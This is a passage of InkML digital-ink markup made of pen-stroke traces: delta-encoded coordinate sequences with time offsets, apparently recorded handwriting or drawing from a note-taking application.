0 16,0-2-2-16,2 1 1 0,-3 0 2 0,1-1-1 15,3 1-4-15,-1 1 2 0,-1 1 2 0,-1-3-3 16,2 4 0-16,-3-1 3 0,1-1-2 0,-2-1-1 16,0 2 3-16,1 2 8 0,-5-1-9 0,0-1-2 15,-2 3 5-15,1-3-4 0,-4 1-2 0,3 1 0 16,1 1 2-16,-4-2-1 0,2 1 3 0,1-1 0 15,0-1-3-15,0 3 1 0,2-3 2 0,2 4 0 16,-1-2 2-16,-3-1-4 0,6 1 3 0,-1 1 4 16,4-2-4-16,-3 0-3 0,0 1 2 0,3 0 3 15,2-1-4-15,0 0-1 0,0-1-1 0,1 1 4 16,-3 1-2-16,4 0 2 0,-2-2 1 0,2 0-4 16,-2 1 0-16,-1-1 1 0,2 2 6 0,-1-1-5 15,-1-1 0-15,-1-1 0 0,5 2-2 0,-2 0-1 16,2 0 3-16,5-1-2 0,-11 0 3 0,11 0-3 15,-11 1 2-15,6-1-2 0,5 0 1 0,-10 0-2 16,1 2 0-16,0-1 4 0,-5 0 6 0,1-1-6 16,-6 2-1-16,1-1 0 0,-3-2 0 0,-1 2 1 15,3-1-1-15,-3 3-2 0,3-3 3 0,-2 0-1 16,2 0 3-16,2-3-5 0,2 3 1 0,0-1-5 16,0 1 6-16,2 0 3 0,-5 0-6 0,4-2 8 15,-4 1-7-15,0 0-1 0,5 1 0 0,-1-2-4 16,0 2 12-16,1 0-3 0,2 0-2 0,-2 2 3 15,5-4-3-15,2 2 0 0,-2 2-2 0,8-2 0 16,-10 0-2-16,6-2 1 0,4 2 7 0,0 0-10 0,-12-1 5 16,12 1-2-16,-7 0 3 0,7 0 0 15,0 0 1-15,0 0-2 0,0 0-6 0,-8 1 6 16,8-1 3-16,0 0-6 0,0 0 0 0,0 0-3 16,0 0 3-16,-6-1 1 0,6 1 0 0,0 0-2 0,0 0 10 15,0 0-10-15,0 0 5 0,0 0-6 0,0 0 10 16,0 0-6-16,0 0 3 0,0 0-3 0,0 0 1 15,0 0 1-15,0 0-6 0,0 0-1 16,0 0 10-16,0 0-8 0,0 0-2 0,0 0 3 0,0 0 6 16,0 0 1-16,0 0-2 0,0 0-6 0,-4 4 2 15,4-4 3-15,0 0-3 0,0 0 1 0,0 0 1 16,-6 1 1-16,6-1-2 0,-9 2 4 0,2-1 3 16,2 2-3-16,-2-3-3 0,0 0 4 0,1 2-2 15,1-1 5-15,5-1-10 0,-8 4 3 0,2-4-3 16,1 1 2-16,5-1 3 0,-9 2 0 0,6-1-5 15,3-1-4-15,-9 0 8 0,9 0 0 0,-9 4-1 16,4-4-1-16,5 0 1 0,-5 0 1 0,5 0 1 16,-8 1-4-16,8-1 4 0,-7 3-2 0,7-3 1 15,-8 0-2-15,8 0 4 0,-4 2 0 0,4-2-7 16,-8 1 6-16,8-1 1 0,-5 3 0 0,5-3-4 16,-6 0 2-16,2 3 5 0,4-3-7 0,-7 1 1 15,7-1 1-15,-8 3-10 0,8-3 8 0,-5 0-1 16,5 0-1-16,0 0 3 0,-7 4-2 0,4-1 1 15,3-3 1-15,-6 2 1 0,3-1-3 0,3-1 0 16,-7 4 2-16,3-2-5 0,-1 1 3 0,-1 1 4 16,1-1-4-16,0 0-3 0,-2 2 4 0,2 0 3 15,-4-2-2-15,0 1 3 0,0-2-2 0,-2 3-3 16,3-1 4-16,-1 1 3 0,-2 0-5 0,3-3 0 16,0 1 0-16,2 0 2 0,-1 1-3 0,1-3 2 15,1 2 2-15,1-2-1 0,-1 2-1 0,1-2-1 16,0 1-4-16,4-2 3 0,-11 4-2 0,8-4-1 15,2 4 4-15,1-4 4 0,-8 3-6 0,7-1 3 16,1-2-4-16,-8 3 12 0,6-2-9 0,2-1-1 16,-8 4-2-16,6-2 7 0,2-2-6 0,-4 1-1 15,1 2 2-15,3-3 4 0,-6 3-2 0,6-3 2 16,-5 5-4-16,0-2 2 0,1-1 1 0,1 0-3 16,-1 2-1-16,2-2 6 0,-2 1-3 0,-1-1 0 15,2 1-3-15,1-1 1 0,-3 1 1 0,5-3-6 0,-7 4 6 16,5-1-3-16,-1 1 5 0,-1 0-2 15,0 1 2-15,-2 1-3 0,0 0 4 0,-2 3-6 16,2-3-2-16,-2 3-5 0,-1-2 14 0,0 0-3 16,3 1-2-16,-1-1-1 0,0-3 1 0,-1 5 0 0,4-4-2 15,-1 1 1-15,-1 2 9 0,-1-3 0 0,4 0-4 16,-3 2-2-16,1-2 2 0,1 3-2 16,-1-2-2-16,0 0-5 0,0 1 3 0,0-1 4 0,1 0 4 15,0 3-9-15,0-1 8 0,1-3 1 0,0 2-5 16,0-1 2-16,1-4-1 0,1 3 5 0,-3-1-4 15,1-1-8-15,2 0 1 0,0-1 0 0,-1 3 3 16,1-2 0-16,1-3-2 0,-2 7 0 0,0-2 5 16,1-2 0-16,1 1-5 0,0-4 1 0,-3 9-3 15,2-6 2-15,1 3 1 0,-1-1 1 0,1 0-2 16,-1-1 2-16,1 1 1 0,-2 0 2 0,1-2 5 16,2 2-11-16,-1 0 1 0,-1 0 4 0,1-1 4 15,-1-1-6-15,2 0 2 0,-1-3 2 0,0 8 0 16,0-8-5-16,-1 6-4 0,1-6 5 0,0 3 3 15,0 1-2-15,0-4-1 0,0 6-1 0,0-6 1 16,1 5 2-16,-1-5-3 0,0 3-11 0,0-3 13 16,0 4 7-16,0 1-3 0,1-3-5 0,-1 4 4 15,0-6-9-15,0 5 9 0,2 0-5 0,-1 0 1 16,0-1 3-16,0 2 4 0,-1-1-8 0,3 4 1 16,-2-4 3-16,2 6 1 0,-1-4 2 0,1 5-14 15,0-3 11-15,1 2-6 0,-2-1-1 0,0 0 5 16,1 0-3-16,0-1 1 0,0 2-1 0,-1-3-13 15,3 5 10-15,-1-5 4 0,-2 2-14 0,2-5-9 16,-3 3-2-16,4 0-6 0,-1-1 4 0,3 1-14 16,-1-1-22-16,-1 1-5 0,4 0-24 0,0 0-15 15,0 0-75-15,5-1-202 0,-1 3 89 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60550.5741">18832 8138 4 0,'0'0'49'0,"0"0"-12"0,1-3-3 0,-1 3-2 16,0 0-7-16,0 0-1 0,0 0-3 0,0 0-4 16,0 0 1-16,12 0-3 0,-12 0-6 0,14 1 2 15,0 1-3-15,2 1-3 0,3 1 6 0,3 0-5 16,5 2 6-16,1-3-6 0,0 0-7 0,-1 3 7 16,-5-1 5-16,6 1-6 0,-7-3 1 0,0 2-3 15,7-2 5-15,-9 0-2 0,1 0-6 0,-1-1-1 16,-6 0 3-16,-1 0 1 0,1 0 1 0,-3 0-2 15,3-1 2-15,-5 1 1 0,1 0-10 0,-2-1 1 16,-2 1 6-16,1-1 0 0,-3 0-3 0,1 0-9 0,-4-1-9 16,7 2-2-16,-7-2-7 0,7 1-27 15,-7-1-57-15,0 0 26 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63665.529">14260 9729 3 0,'35'7'25'16,"3"-1"3"-16,-4 0-5 0,0 0-1 0,3 0-3 15,-1 1 0-15,0-2-6 0,1 1 3 0,1 0-2 16,0-1 2-16,15 1-1 0,-1 0-3 0,0 1 8 16,-12-2-1-16,14 2-5 0,-4-4-4 15,2 5 1-15,-13-3-4 0,14-1 6 0,1 1 1 0,-1 1-7 16,-3 1 4-16,-9-4 1 0,9 7-1 0,-8-8 2 0,-2 0-3 15,-2 1-2-15,-1 2-2 0,-1-1 3 16,-5 0 0-16,-2-1-3 0,-7 0-10 0,-3-1-19 16,-6 3-45-16,-3-2-74 0,-2 0 32 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65000.9671">19872 8410 135 0,'0'0'123'0,"0"0"-11"0,0 0-11 16,-13 10 0-16,3-1-6 0,0 7-9 0,-8 7 16 16,-3 2-10-16,1 4 5 0,-12 10-11 0,5 0-4 15,1 0-5-15,1 1-1 0,5-9-14 0,2-1-9 16,4 0-7-16,-3-3 0 0,4 1-7 0,3-5-5 16,-3 1-7-16,8-5-10 0,-2-1-16 0,1-2-18 0,1-3-23 15,4-1-19-15,-1-1-17 0,2-1-20 16,0 1-14-16,0-5-7 0,2 1-80 0,-1-3-211 0,1-3 94 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65741.3229">19977 8244 111 0,'0'0'116'0,"0"0"-3"16,0 0 0-16,0 0-11 0,0 0-4 0,0 0 0 15,0 0-20-15,0 0 1 0,0 0-13 0,0 0 3 16,0 0-3-16,4-3-10 0,-4 3-11 0,0 0 3 16,0 0 0-16,0 0-9 0,7 0-1 0,-7 0-9 15,8-3 0-15,-5 2-2 0,3-1 0 0,-6 2-1 16,10 0-7-16,-5 0 6 0,3-2-6 0,-3 1 3 16,4 0-9-16,1-1 6 0,-1 1 1 0,4 0 0 15,-4 1 5-15,3-2-1 0,0 2-5 0,1-2 0 16,0 2-4-16,0 0 5 0,-2 0-3 15,1-1-4-15,-1 1 7 0,-1 0-6 0,0 0-6 0,2 0 3 16,-3 1-3-16,-1 1-1 0,-1-2 1 0,-2 0-5 16,2 2 3-16,-3-1-4 0,2 0 4 0,-2 1-2 15,-2 0 0-15,-2-2 3 0,8 4-2 0,-5-3-4 16,-1 3 4-16,1-2 0 0,2 1 0 0,-4 1 0 16,0 0 1-16,3-1-3 0,-4-3 6 0,3 6-2 15,-1-2-2-15,0-1-4 0,-2 1 5 0,2 1-3 16,0 0 0-16,-1 0 2 0,-1 0-2 0,0-1 0 15,1 4-1-15,-1-4-3 0,0 3 10 0,-1 3-1 0,1-3 0 16,-4 4 6-16,1-2 0 0,1 1 3 0,-2 1 3 16,-1 0-8-16,-3-1 2 0,3 0-2 15,-3-2 9-15,3 1-7 0,0-1-3 0,-4 1-1 16,3-2 0-16,-1-1 3 0,-2 0-1 0,-1 2 3 0,1-1 1 16,0-3-2-16,-3-1-1 0,3-1 1 0,-5 4-3 15,1-5 3-15,-3 1-1 0,1 1 3 0,-3-6-1 16,-1 3-2-16,0 0 1 0,-2-1-3 0,-2-4 0 15,3 2-4-15,1 0 5 0,0 0 0 0,0-3 0 16,6 1-3-16,-4 1 4 0,6-3-7 0,-4 1-1 16,3 2 4-16,0-1-2 0,1 0-1 0,-1-2 1 15,3 2-2-15,-1 0-2 0,5 1 1 0,-3-1 6 16,3 2-5-16,1 0-1 0,-2-2-6 0,2 2-6 16,0 0-13-16,1 2-22 0,-1-1-33 0,4 2-22 15,-3-4-41-15,3 4-32 0,-4-4-19 0,4 4-113 16,0 0-328-16,0 0 145 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="67390.2314">20000 8161 93 0,'-38'6'101'16,"0"4"-5"-16,0-1-18 0,0 0 17 0,6 2-11 15,-3 3-12-15,7 1 2 0,-2-1 2 0,3 0-23 16,10 0 6-16,2-3-14 0,2 1-6 16,5-1 6-16,1-3-10 0,0 5-5 0,6-2 2 0,1 4 1 15,0-2-4-15,3-2-1 0,2 0-3 0,5 1 3 16,0 0-6-16,4-1-4 0,0-2 4 0,4 0-11 16,-1-4 15-16,4 3 3 0,2-6-1 15,3 4-6-15,2-3 4 0,4-1 3 0,-4-4-3 0,0-1-4 16,-6-1 4-16,0 0 2 0,-2-4 5 0,-1 3-1 15,-2-4 3-15,-3 3 5 0,0-5 0 0,0 1-1 16,-2-3 4-16,-1-2-2 0,-3-2-1 0,0 1-4 16,-2-2 4-16,-1 0-3 0,-1-2 2 0,-3 2 1 15,-1-1-1-15,-1 2-3 0,-3 0-7 0,-1 1 1 16,-1 0-1-16,-1 3-3 0,2 1-1 0,-4 5-5 16,5-3-4-16,-1 3 4 0,1-1-8 0,-1 6-10 15,4-3-17-15,-2 1-34 0,2 2-28 0,1 2-8 16,0 0-5-16,0 0-12 0,-6 11-14 0,6-1-31 15,-3 0-2-15,3 11-114 0,0-4-284 0,0 3 126 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="67749.9277">20091 8974 110 0,'0'0'149'0,"0"0"0"15,0 0-6-15,0 0-9 0,0 0-19 16,0 0-11-16,0 0-12 0,0 0-15 0,0 0-4 0,0 0-11 16,0 9 0-16,-7-2 1 0,-3 6-2 0,-5 1 5 15,-2 7-11-15,-5 1-6 0,-2 1 2 0,1 4-8 16,0 0-6-16,3-4 1 0,1-3-9 16,0 3 0-16,7-9 1 0,-1 1-17 0,4 0-14 0,0-4-18 15,4-1-15-15,0-1-17 0,2-1-18 0,-2-3-33 16,1 4-20-16,4-3-118 0,-4-1-259 0,2-1 115 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="68855.1882">20071 8983 50 0,'0'0'62'16,"0"0"-8"-16,0 0 1 0,0 0-2 0,0 0 2 15,0 0-10-15,0 0 0 0,0 0 3 0,0-5-1 16,0 5 5-16,0 0-5 0,0 0-5 0,0 0-5 16,0 0 6-16,0 0-1 0,0 0-1 0,0 0-4 15,0 0-2-15,0 0-3 0,0 0 3 0,0 0-4 16,0 0-6-16,0 0 10 0,0 0-13 0,4-4-2 15,-4 4 2-15,0 0 0 0,4-3-8 0,-4 3 6 0,0 0-10 16,0 0 3-16,5-2-11 0,-5 2 13 0,0 0-2 16,0 0-4-16,0 0 10 0,4-2-11 15,-4 2-1-15,0 0 7 0,0 0-11 0,0 0-3 0,0 0 3 16,0 0 1-16,0 0-7 0,0 0 4 0,0 0 6 16,0 0-3-16,0 0-9 0,0 0 2 0,9 4-1 15,-9-4 11-15,0 0-10 0,6 2 5 0,-3-1 14 16,-3-1-17-16,0 0 4 0,6 3-5 0,-6-3-1 15,0 0 10-15,4 3-9 0,-4-3 2 0,0 0 3 16,0 0 0-16,5 1 3 0,-5-1-4 0,6 1 2 16,-6-1 0-16,4 3-1 0,-4-3 3 0,6 1-3 15,-6-1 3-15,3 1-5 0,-3-1 6 0,6 4-3 16,-6-4 3-16,3 2-14 0,-3-2 6 0,3 2-2 16,-3-2-5-16,0 0 7 0,5 2 2 0,-5-2 2 15,0 0-7-15,6 2 8 0,-6-2 3 0,0 0-5 16,0 0-3-16,0 0 3 0,4 1-4 0,-4-1 0 15,2 3 11-15,-2-3-11 0,0 0 2 0,2 4 4 16,-2-4 1-16,0 0-9 0,5 3 7 0,-5-3-8 16,0 0 2-16,5 2-1 0,-3 0 2 0,-2-2 6 15,0 0-4-15,4 4 9 0,-3-1-7 0,1-1 1 16,-1 1 1-16,3 0 5 0,-2 3 3 0,0-1-7 16,-2 0-2-16,3-1 5 0,-1 1-6 0,-2 1 3 15,0-1 2-15,2 1 5 0,-2 0-4 0,2 0-5 16,-2-2 0-16,0 2-2 0,0-2 4 0,0 2-2 0,0-3-7 15,0 3 13-15,0-6-6 0,0 3 2 16,0-3 4-16,0 4-3 0,0-4 2 0,0 0 4 16,0 4 1-16,-2 1-1 0,2-5 2 0,0 0 0 15,0 0 6-15,0 0-6 0,-6 1 7 0,3 1-3 0,3-2-3 16,0 0-2-16,-16-2 3 0,11 2-1 0,-6 0-5 16,2-1 6-16,0-4-7 0,-1 2 0 15,0 1 4-15,-1-1 2 0,2 2-10 0,-2-4 0 16,2 0 6-16,-3 2-3 0,2-1 1 0,-3 0-4 0,3-2 0 15,-3 1-4-15,4 4 2 0,-5-6 0 0,4 1 0 16,0 2-3-16,-2-1 3 0,3 0-6 0,2-1 5 16,0 3-3-16,0 0 7 0,2-1-7 15,1 2 5-15,1 1-5 0,-1-3 4 0,0 2-4 0,4 2-2 16,-3-3-8-16,3 3-10 0,-4-2-9 0,4 2-18 16,0 0-14-16,0 0-22 0,0 0-22 0,0 0-34 15,0 0-83-15,6-5-241 0,-6 5 106 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="69857.1737">20437 9131 24 0,'0'0'89'0,"0"0"7"15,5-3-7-15,-5 3-7 0,0 0 12 0,0 0-4 16,1-5 4-16,-1 5-4 0,0 0 1 0,0 0-2 0,0 0 3 15,0 0-2-15,0 0-6 0,0 0-8 16,0 0-9-16,0 0-5 0,0 0-9 0,0 0-7 16,0 0-4-16,0 0-4 0,0 0-9 0,0 0-3 0,0 0-3 15,0 0-8-15,0 0-1 0,0 0 2 16,-6 14 2-16,2-9-2 0,-1 4-5 0,-3 1 0 0,-6 2 5 16,5-2-5-16,0-1 0 0,0 2-5 0,-1-3 5 15,3 1-5-15,-1-1 0 0,-1 0 3 16,3 0-1-16,-2-1-5 0,3 3 2 0,-2-2 1 0,-1 0 1 15,1-2 1-15,2-1-5 0,1-2 1 0,0 3-2 16,0-3 2-16,-2 0-1 0,2-1-3 0,4 3 1 16,0-5-2-16,-5 5 6 0,4-3-2 0,1-2 1 15,-3 4 0-15,3-4 0 0,-4 1-7 0,4-1-3 16,0 0-11-16,0 0-9 0,-1 4-9 0,1-4-9 16,0 0-12-16,0 0-11 0,0 0-10 0,0 0-11 15,0 0-27-15,0 0-114 0,0 0-248 0,1-16 110 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="70353.5339">20599 8886 70 0,'0'0'139'0,"5"-3"-2"15,-5 3-11-15,0 0-16 0,0 0-12 16,0 0-9-16,0 0-8 0,0 0-9 0,0 0-17 0,0 0-5 16,0 0 1-16,0 0-5 0,0 0-8 0,0 0-13 15,3 9 7-15,-3-9-1 0,1 5 5 0,-2-1 11 16,1 3 15-16,0 0-3 0,0 0-2 0,0 3 8 16,-1-2-6-16,-1 3-5 0,2-4-6 0,0 3 2 15,0 0 1-15,-2-1 3 0,0 1 4 0,1-1-4 16,0 1-6-16,0-3-4 0,2 1-4 0,-2-1-3 15,2 1-3-15,-2-2-3 0,-1 1-5 0,2 2 3 16,-1-1-2-16,2-2-7 0,-1-2 3 0,0 3-4 16,0-3 5-16,2-1-10 0,-2 0-1 0,0-3 2 15,-2 9-3-15,2-9 1 0,0 3-2 0,0-3-3 16,-1 3-11-16,1-3-11 0,0 0-12 0,0 0-20 16,-1 4-16-16,1-4-15 0,0 0-49 0,0 0-38 15,0 0-165-15,0 0-357 0,-3-16 157 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="72089.3671">20831 9223 60 0,'0'0'70'15,"0"0"-3"-15,0-5 0 0,0 5-4 0,0 0 4 16,0 0-19-16,0 0-6 0,0-4-2 0,0 4 2 16,0 0-9-16,0 0-5 0,0 0-2 0,0 0 2 15,0 0-11-15,0 0-9 0,0 0 11 0,0 0-18 16,0 0-14-16,0 0-12 0,0 0-13 0,0 0-21 16,0 0-40-16,0 0-106 0,0 0 46 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="72683.4207">20535 9354 42 0,'0'0'130'0,"0"0"-1"0,0 0-5 0,-2-2-12 15,2 2-2-15,0 0-13 0,0 0 2 0,0 0-16 16,0 0-7-16,-4-4-5 0,4 4-6 0,0 0-4 16,0 0-7-16,0 0-1 0,0 0-12 0,0 0-1 15,0 0-7-15,0 0-4 0,0 0-3 0,0 0-6 16,0 0-1-16,0 0-5 0,0 0-3 0,0 0 1 15,0 0-4-15,8 10 4 0,-7-7 5 0,3 1 9 16,0 0-1-16,1 1 6 0,2 0-2 0,0 1 0 16,-2 2 0-16,1-4 1 0,2 2-1 0,2 3-4 15,0-2 8-15,-1 0-6 0,3 2-1 0,-1-5 0 16,0 4 6-16,1-2 0 0,1-1 0 16,-3 2-1-16,3-3-1 0,-1-1 1 0,2 2 3 0,-4-1-3 15,0-1 1-15,-1-1-1 0,-1 1-2 0,-2-2-4 0,-1 0 5 16,0 1 2-16,0-1 6 0,-5-1-3 15,7 2 1-15,-7-2 3 0,6 1 2 0,-6-1-7 16,4 3-1-16,-4-3-2 0,0 0 0 0,0 0-6 16,0 0-10-16,0 0-30 0,5 0-44 0,-5 0-64 0,0 0-84 15,0 0-184-15,0 0-421 0,-6-10 187 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="73747.6609">21051 9223 88 0,'0'0'122'0,"0"0"-12"15,-2-3-3-15,2 3-14 0,0 0-2 0,0 0-7 16,0 0-3-16,0 0-2 0,0 0-9 0,0 0-16 16,0 0 0-16,0 0-4 0,0 0-4 0,0 0-13 15,0 0-7-15,0 0 3 0,0 0-8 0,0 0 1 16,0 0-2-16,-4 11 2 0,2-6 11 0,-1 1 2 0,-1 2 0 15,-2 0-3-15,-2-1-4 0,2 2 2 0,0 2-5 16,0-8-4-16,-1 8 0 0,0-4 4 0,0 2-4 16,2-5 7-16,-1 3-8 0,0 0-1 0,1-1-4 15,0-2 3-15,0 0-3 0,0 1-2 0,2-2-7 16,-1 1 1-16,3-2 7 0,-2 2-5 0,3-4-2 16,-6 4 4-16,6-4 3 0,-1 3-1 0,1-3-3 15,0 0 1-15,-4 2 0 0,4-2 4 0,0 0 8 16,0 0 1-16,0 0 1 0,0 0 2 0,0 0 4 15,0 0 2-15,0 0-5 0,0 0 3 0,0 0-7 16,0 0-2-16,0 0-4 0,0 0 0 0,0 0-2 16,0 0 1-16,0-11-3 0,0 11-7 0,5-6 4 15,-1 1-4-15,-2 0-1 0,2 1-1 0,0 0-1 16,0 0 2-16,-3 0-1 0,4 1-5 0,-1 1 0 16,0-2-7-16,-4 4-10 0,4-6-14 0,-3 4-15 15,-1 2-14-15,3-4-24 0,-3 4-23 0,3-4-20 16,-3 4-21-16,0 0-126 0,0 0-295 0,0 0 131 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="74889.7749">19390 9652 29 0,'4'-2'154'16,"-4"2"-4"-16,0 0-10 0,0 0-5 15,0 0-11-15,0 0-13 0,0 0-14 0,0 0-14 16,0 0-6-16,4-3-13 0,-4 3-12 0,0 0-2 0,0 0-7 16,0 0-4-16,-3 12 7 0,-2-6 5 0,3 3-1 15,-5 2-8-15,2-1-2 0,1 2-4 0,-1-2 0 16,1-1-7-16,-2 0-3 0,2-1-6 0,0 2 0 15,1-5 4-15,1 2-2 0,-2 0-3 0,3-2-2 16,-3 2-4-16,0-2 4 0,1-2-1 0,1 4-5 16,1-3 3-16,1-1-5 0,0-3-1 0,-2 3 2 15,2-3 5-15,-2 4 0 0,2-4-4 0,0 0-1 16,0 0 0-16,0 0-1 0,0 0 1 0,16-7-4 16,-13 1 4-16,5-3-9 0,6 3 0 0,-1-5 7 15,0 2 0-15,-2-1-5 0,-2 1 3 0,4-1 1 16,-3 0-4-16,4-1-2 0,-1 1-1 15,-3 1 1-15,2 3-4 0,3-5 2 0,-5 4 3 0,7-3-4 16,-7 3 4-16,2 2-4 0,-1 0 2 0,-1 0-3 16,-2 2 0-16,-2 1 3 0,-1-1-4 0,3 0-3 15,-4 3-2-15,-4 0 1 0,8 0 2 0,-8 0 1 16,7 3-2-16,-3 1 3 0,0 1-1 0,-4 3 2 16,0-2 0-16,0 6 0 0,-4-2 0 0,-1 6 5 15,-4 1 1-15,0-1-3 0,-1 9 4 0,-3-11 3 0,-1 2-4 16,3-2 1-16,0-2 1 0,4-2-2 0,-1-1-4 15,2-2 5-15,2-1-4 0,0 0 1 16,1-1 1-16,0-1-3 0,0 0 2 0,2-3 4 16,1-1-5-16,-3 6 0 0,3-6 2 0,-2 4-1 0,2-4 2 15,0 0 0-15,1 4 2 0,-1-4-2 0,4 2 0 16,-4-2 1-16,13 0 5 0,2-2-3 0,2 0 0 16,-1-2-8-16,3-2-3 0,3 3-3 15,-3-4-5-15,-1 2-7 0,1-1 0 0,-2-2-2 0,0 3-1 16,0-2 4-16,-6 1-1 0,0 1 0 0,-1-1 3 15,-1 3 3-15,-4 0 6 0,1-2 1 0,-1 3-3 16,0 1 7-16,-2-3 8 0,0 3 0 0,-3 1 1 16,5-3 0-16,-5 3 3 0,0 0-4 0,5-3-4 15,-5 3-1-15,0 0 0 0,0 0-3 0,0 0 1 16,6-1-5-16,-6 1 3 0,0 0 2 0,-2 8 12 16,2-3 11-16,0-5-6 0,0 10 2 0,0-6-2 15,0 1-6-15,-1 1 1 0,1 1 1 0,-3-1-3 16,3 2-27-16,0 1-24 0,-1 0-27 0,1 0-34 15,0 1-48-15,0 2-113 0,-4-3-285 0,4 3 126 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="75181.354">19996 9855 77 0,'0'0'165'16,"1"-4"2"-16,-1 4-11 0,0 0-9 0,0 0-9 16,0 0-25-16,0 0-9 0,0 0-14 0,0 0-17 0,0 0 3 15,3 10-5-15,-3-7-5 0,0 2-2 0,0 4-7 16,-3 0-3-16,2 1-2 0,-3 3-8 15,2 3-4-15,-2-1 2 0,1-2-10 0,-1 4-13 16,-1-1-14-16,0-2-21 0,1-3-26 0,1 1-24 0,1-1-21 16,-2 0-14-16,2 0-14 0,1-3-21 0,-2 1-80 15,2-4-232-15,1 1 104 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="75458.4932">20120 9994 101 0,'-15'7'149'0,"-4"4"-6"0,-6 3-3 16,-3-4-9-16,0 3-7 0,0 0-11 0,-2 4-12 15,0 0-4-15,-4-1-8 0,6-1-6 0,-6 2-5 16,2-2-6-16,3 3-4 0,-2-1-13 0,3-3-6 16,1 0-6-16,8-4 0 0,2 0-4 0,3-6-12 15,5 4-16-15,-1-3-23 0,1-1-27 0,5 2-15 16,-4-1-23-16,3-1-20 0,4 0-24 0,-4 1-105 16,5-2-246-16,0-3 109 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="75758.6088">20133 10203 146 0,'0'0'172'16,"0"0"-11"-16,0 0-14 0,2-2-12 0,-2 2-13 16,0 0-14-16,0 0-13 0,0 0-10 0,0 0-11 0,0 0-7 15,8 6-2-15,-5-4-1 0,0 0-7 0,4 2-2 16,0-2-3-16,6 3-2 0,-1 0-5 0,0-1 6 16,1 1-15-16,1-1-5 0,-1 0-1 0,1-1-9 15,0 3-12-15,-1-1-25 0,1-4-22 0,-5 3-23 16,5 1-31-16,-2-2-27 0,1 0-28 0,-2 1-88 15,-1-1-253-15,5-2 112 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="76485.442">20797 10118 64 0,'0'0'163'0,"0"0"-10"15,0 0-15-15,-2-4-10 0,2 4-14 0,0 0-7 16,-13 5-12-16,4 1 1 0,-2 1-5 0,-6 3-2 15,4 3-6-15,-7 5-1 0,2-1-10 0,-3 1-2 16,1 3-1-16,3 1-3 0,-3-2-7 0,3 2-5 16,-1-3-3-16,7-4-4 0,-3 1-5 0,5 0-5 15,-4-3-6-15,6-2 3 0,-5 3-7 0,4-2 1 16,0-7-10-16,2 2 3 0,4-2-1 0,-5-2-5 16,7 4 4-16,-4-4 1 0,3 0-1 0,-3 0-1 15,4-3-6-15,-4 3 5 0,4-3-3 0,-5 2-10 0,5-2-8 16,0 0-10-16,0 0-16 0,0 0-11 15,5-11-4-15,-1 5-6 0,1-1 0 0,3-5 6 16,0 2-14-16,3-4-1 0,1-1-6 0,6-5-7 16,-6 4-3-16,2 0-8 0,3-3 6 0,-3 3 1 0,-1 2 0 15,5-8 10-15,-5 6 15 0,0 2-6 0,3-8 9 16,-6 9 10-16,3 1 9 0,-4 2-1 16,0 3 17-16,0-1 8 0,-4 0 10 0,0 3 15 0,0-1 0 15,-1 0 13-15,0 3 5 0,0-1 2 0,1-2 3 16,-3 4-2-16,1-1 1 0,-3 3-4 0,4-6 2 15,-2 5-5-15,1-3-6 0,-3 4 2 0,5-2-3 16,-5 2 1-16,8-3 2 0,-2 3-1 0,-6 0-3 16,12 2 6-16,-5-2-4 0,1 2-2 0,-1 2 3 15,1-2-5-15,1 1 2 0,1 3-3 0,-3-2 0 16,-1 0-3-16,-1 0 1 0,4-1-4 0,-6 3 1 16,3-1 0-16,-5-2 3 0,3 2-4 0,0 0 3 15,-3-1-5-15,-1 1 3 0,0 0 5 0,0 0-1 16,-3 2 2-16,-3-1 3 0,1 3-3 0,-5-3 5 15,1 2-1-15,-4-2-1 0,-5 0-4 0,3-1 3 16,1 0-3-16,3-3-1 0,-5 2-1 0,3-1-2 16,1-2 1-16,-1 0-5 0,0 2-1 0,2-4 0 15,-1 1 7-15,-1 0-10 0,3-2 1 0,2 1-2 16,3 2-10-16,-3-1-7 0,8 0-15 0,-10-2-23 16,10 2-27-16,-7 0-20 0,7 0-30 0,0 0-9 15,-5-2-10-15,5 2-11 0,-2 7-125 0,-3-5-299 16,4 2 133-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="76861.4921">20893 10345 102 0,'0'0'155'0,"0"0"3"0,0 0-16 0,0 0-12 16,0 0-9-16,0 0-13 0,0 0-9 16,0 0-16-16,0 0-8 0,0 0-11 0,0 0-2 15,0 0-13-15,4 7 7 0,-4-7-6 0,0 6 5 0,0-2 0 16,-4 1 4-16,4 0-1 0,-4 2 1 0,3 2 1 15,-3-3 8-15,-3 4-5 0,1-2-8 0,0 1-1 16,2-1-3-16,-1 0-11 0,1 0-4 0,-1 2-3 16,-1-4 0-16,1 0-4 0,0 2-5 0,-1 1-4 15,4-4-3-15,-3 0-12 0,1-2-15 0,1 4-11 16,1-3-23-16,-2-2-4 0,2 1-18 0,2-3-16 16,-3 1-6-16,3-1-9 0,0 0 1 0,0 0-8 15,0 0-8-15,0 0-16 0,0 0-111 0,15-4-259 16,-10-1 115-16</inkml:trace>
